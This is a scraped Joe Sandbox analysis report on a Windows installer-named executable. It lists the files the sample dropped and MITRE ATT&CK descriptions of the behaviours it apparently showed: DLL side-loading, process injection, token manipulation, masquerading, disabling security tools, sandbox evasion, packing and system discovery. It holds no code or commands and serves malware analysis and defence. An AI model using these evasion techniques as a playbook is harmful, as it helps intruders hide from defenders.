Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows NT\7zr.exe

C:\Program Files (x86)\Windows NT\file.bin (copy)

C:\Program Files (x86)\Windows NT\hrsw.vbc

C:\Program Files (x86)\Windows NT\is-0F5J3.tmp

C:\Program Files (x86)\Windows NT\is-QJ471.tmp

C:\Program Files (x86)\Windows NT\locale.bin

C:\Program Files (x86)\Windows NT\locale.dat

C:\Program Files (x86)\Windows NT\locale2.bin

C:\Program Files (x86)\Windows NT\locale2.dat

C:\Program Files (x86)\Windows NT\locale3.bin

C:\Program Files (x86)\Windows NT\locale3.dat

C:\Program Files (x86)\Windows NT\locale4.bin

C:\Program Files (x86)\Windows NT\locale4.dat

C:\Program Files (x86)\Windows NT\locale7.bin

C:\Program Files (x86)\Windows NT\locale7.dat

C:\Program Files (x86)\Windows NT\res.dat

C:\Program Files (x86)\Windows NT\tProtect.dll

C:\Program Files (x86)\Windows NT\task.xml

C:\Program Files (x86)\Windows NT\trash (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.6.exe

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre